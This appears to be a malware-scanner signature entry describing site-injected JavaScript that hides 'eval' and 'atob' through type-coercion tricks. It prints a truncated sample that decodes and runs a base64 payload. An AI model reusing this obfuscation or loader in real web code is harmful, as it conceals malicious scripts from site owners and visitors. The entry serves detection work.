Description:
Suspicious code that uses various JavaScript implicit type conversion tricks to obfuscate the code. For example, (!1+'')[3-2] gives 'a', (''+(1==1))[0] gives 't', and (''+{})[2] gives 'b', which results in malicious code that looks like this:
function yyCx6n() { return this; }; yyCx6n()[(!1+'')[4] + 31..toString(36) + (!1+'')[3-2] + (!!0+'')[2]](yyCx6n()[(!!0+'')[3-2] + (''+(1==1))[0] + (''+{})[ 1] + (''+{})[2]](('ZnVuY3Rpb24gRkZfTWFpbkZ1bmMoKXt'+'2YXIgYT0nZnhwc2Uzai;c7aWYod'+'HlwZW9mIFN0b3JhZ2UhPT0idW5kZWZpb'+'mV ...skipped... Ccs;RkZfTWFpbkZ1bmM'+'pOw;==')[qqAOnD[19]+qqAOnD[21]+qqAOnD[22]+qqAOnD[3]+qqAOnD[23]+qqAOnD[18]+qqAOnD[21]](/;/g, '')))
Affecting: Any web site (no specific target).